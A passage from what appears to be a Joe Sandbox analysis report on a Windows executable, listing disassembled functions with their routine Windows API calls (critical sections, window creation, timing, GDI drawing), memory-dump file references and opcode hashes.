                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 32add75de912499d63db8df7e296ef1919b4cd71e3024a8d459c2c8f380e6b48
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59012975302A155FD324EB2ADC90B6BE3F9AF91354F00842FE546C3750CB64FC058AA9
                                                                                                                                                                                                                                                                                                                          Function 004D8640 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,Dummy,80000000,00000000,00000000,00000005,00000005,00000000,00000000,00000000,00000000), ref: 004D866B
                                                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 004D8683
                                                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,004D8520), ref: 004D8690
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$Create
                                                                                                                                                                                                                                                                                                                          • String ID: Dummy$STATIC
                                                                                                                                                                                                                                                                                                                          • API String ID: 1733017098-132613206
                                                                                                                                                                                                                                                                                                                          • Opcode ID: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60c9263fdfddd51d1a46959990d996e43c4a0f9c9599785539e6d357df671051
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F0303138471076E630A66ABC06F57B6EC9B59F31F21071AB319F76E0DAE0F8004A2C
                                                                                                                                                                                                                                                                                                                          Function 004F5A70 Relevance: 7.6, APIs: 6, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,?,00000000,00000000,004EF87C,?,?,004AC02B,?,?), ref: 004F5A80
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5A8A
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F5B2E
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5B3D
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002), ref: 004F5B78
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5B8A
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 42192e3c7faa4449eaa7148df56c5331408008ed83f87a65c0d534a8c29348b8
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41B634300B0D5BD7259F319894BBB77A9AF80704F08415EEB6A8B392DB18FC15D768
                                                                                                                                                                                                                                                                                                                          Function 004F26C0 Relevance: 7.6, APIs: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(?,?,?,?,?,?), ref: 004F274C
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?), ref: 004F277D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004F2787
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(?,?), ref: 004F2792
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(?,?,?,?,?), ref: 004F27C6
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Timetime$CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1404962471-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9d8894fa7cd5c1a3a8d1574b016894ebc4e8e1121a62fd2c9071eafdbb47ea2c
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B531BC35208B049BC314DF25E9956ABB7F1FFC9720F148A2DE4EA83390DB34A419CB56
                                                                                                                                                                                                                                                                                                                          Function 005293B0 Relevance: 7.6, APIs: 5, Instructions: 77sleepCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 00529421
                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,08000041,?,?,00529592,?,?), ref: 00529431
                                                                                                                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 0052943A
                                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000378,00000000), ref: 0052944F
                                                                                                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0052947B
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: ExchangeInterlocked$Compare$Sleep__aulldiv
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1430435781-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                                                                                                                                          • Instruction ID: c7c6432b147b16162d76303af8a74e071e756cb34c164aed74e4a8b1f06fd785
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C215AB15007409FD7219F2A9844A67FEFCFFA1705F10851FA45A873A1D7B4A904CB64
                                                                                                                                                                                                                                                                                                                          Function 004F5CB0 Relevance: 7.6, APIs: 6, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3111dceef54b192a201187cebb12310cd19e01e5115420dd7c98ed3fae01612e
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2921A73520174A4BD710AF66E888BFFB7B8EB60305F00852FEB4643251C779A84ADB64
                                                                                                                                                                                                                                                                                                                          Function 004D8010 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 004D802E
                                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004D8044
                                                                                                                                                                                                                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 004D8067
                                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004D8075
                                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004D8078
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Object$Select$BrushCreateDeleteFillRectSolid
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3777265051-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                                                                                                                                          • Instruction ID: d8a686452ba02d7e488f009474b8275e6b936404318e954abf19810798465268
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76019A752042046FC304DB69ED88C6B7BF8EACD614B000A5DFA8983312E635E806DB71
                                                                                                                                                                                                                                                                                                                          Function 004E4660 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E468C
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,0041D485), ref: 004E46A2
                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D0
                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D9
                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46E6
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
